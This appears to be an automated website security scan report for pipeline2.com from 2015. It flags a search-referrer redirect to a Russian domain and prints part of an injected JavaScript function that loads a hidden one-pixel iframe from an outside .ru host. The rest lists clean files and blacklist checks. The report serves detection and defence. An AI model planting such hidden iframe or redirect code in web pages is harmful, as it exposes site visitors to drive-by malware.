Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pipeline2.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pipeline2.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 29 Nov 2015 10:44:29 GMT Location: http://ypnofkiq.ru/count28.php Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://pipeline2.com/ | 200 OK Content-Length: 4267 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var xi = document.createElement('iframe'); xi.src = 'http://ryteopby.ru/count4.php'; xi.style.position = 'absolute'; xi.style.border = '0'; xi.style.height = '1px'; xi.style.width = '1px'; xi.style.left = '1px'; xi.style.top = '1px'; if (!document.getElementById('xi')) { document.write('<div id=\'xi\'></div>'); document.getElementById('xi').appendChild(xi); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); i Antivirus reports:
| ||
http://ldm.by/images/SHARK-1.php | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0,no-cache,no-store Connection: close Date: Sun, 29 Nov 2015 10:44:30 GMT Location: http://www.ldm.by/ Server: nginx Content-Length: 0 Content-Type: text/plain; charset=utf-8 | clean |
http://www.ldm.by/ | 200 OK Content-Length: 22424 Content-Type: text/html | clean |
https://mc.yandex.ru/metrika/watch.js | 200 OK Content-Length: 65912 Content-Type: application/x-javascript | clean |
http://ldm.by/images/js.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://ldm.by/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pipeline2.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pipeline2.com/
Result: pipeline2.com is not infected or malware details are not published yet.
Result: pipeline2.com is not infected or malware details are not published yet.